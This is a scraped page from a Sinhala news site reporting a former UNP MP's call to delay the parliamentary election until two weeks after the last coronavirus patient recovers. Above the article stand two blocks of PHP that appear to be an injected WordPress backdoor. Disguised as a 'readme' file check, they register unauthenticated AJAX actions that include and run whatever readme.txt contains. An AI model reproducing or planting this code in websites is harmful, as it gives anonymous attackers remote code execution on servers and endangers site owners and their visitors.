if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } මැතිවරණය කැදවිය යුත්තේ අවසාන කොරෝනා රෝගියාත් සුව වී සති දෙකකට පසුයි.. රටේම මතය එයයි. - mediahumanrights.lk
mediahumanrights.lk
News Political

මැතිවරණය කැදවිය යුත්තේ අවසාන කොරෝනා රෝගියාත් සුව වී සති දෙකකට පසුයි.. රටේම මතය එයයි.

අවසාන කොරෝනා රෝගියාද සුවපත් වී සති දෙකක් ගිය පසු මැතිවරණයක් ප්‍රකාශයට පත් කිරීම රටේ ජනතාවගේ මතය වී ඇතැයි එක්සත් ජාතික පක්ෂයේ හිටපු පාර්ලිමේන්තු මන්ත්‍රී සමගි ජනබලවේගය අපේක්ෂක අජිත් මාන්නප්පෙරුම මහතා සඳහන් කරයි.

මේ මොහොතේ මැතිවරණයක් පැවැත්වීට රටේම ජනතාව දැඩිව විරුද්ද බවත් තමන් පෙනී සිටින්නේ ද රටේ පොදු මතය වෙනුවෙන් බවත් ඔහු පැවසීය.

එනිසා පාර්ලිමේන්තු මැතිවරණය පැවැත්විය යුත්තේ අවසන් කොරෝනා රෝගියාද සුවපත් වී කිසිදු කොරෝනා රෝගියෙක් නැති තත්වයක් යටතේ යයිද ඔහු සඳහන් කළේය.

මාධ්‍ය හමුවක් අමතමින් ඔහු මෙම අදහස් පල කලේය.
(under the courtesy of lankacnews.com news web)

Related posts

සරසවි සේවකයන්ට කදුළු ගෑස්..

Shiran Viraj

රෝහල් රැසකම ශල්‍ය උපකරණ හිඟයක්.. සැත්කම්වලට බාධා…

Shiran Viraj

රුසියාවෙන් තෙල් ගන්නේ නැත්තේ ඇමරිකාව තරහ වෙන නිසා..- අගමැති රනිල්

Shiran Viraj